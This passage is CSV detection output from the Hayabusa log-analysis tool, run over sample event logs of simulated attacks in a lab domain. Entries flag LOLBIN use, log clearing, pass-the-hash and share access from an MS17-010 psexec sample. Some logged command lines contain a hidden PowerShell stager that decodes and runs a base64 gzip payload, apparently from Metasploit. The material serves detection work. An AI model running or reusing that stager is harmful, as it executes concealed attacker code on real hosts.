0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x74872,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: 0Konuy9q8HtkWeKS | IP Addr: 10.23.123.11 | LID: 0x74872,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x74872,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWi
ndow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7f0 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.633 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x76e83,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x76e83,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.539 
+09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x7777e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x7777e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - 
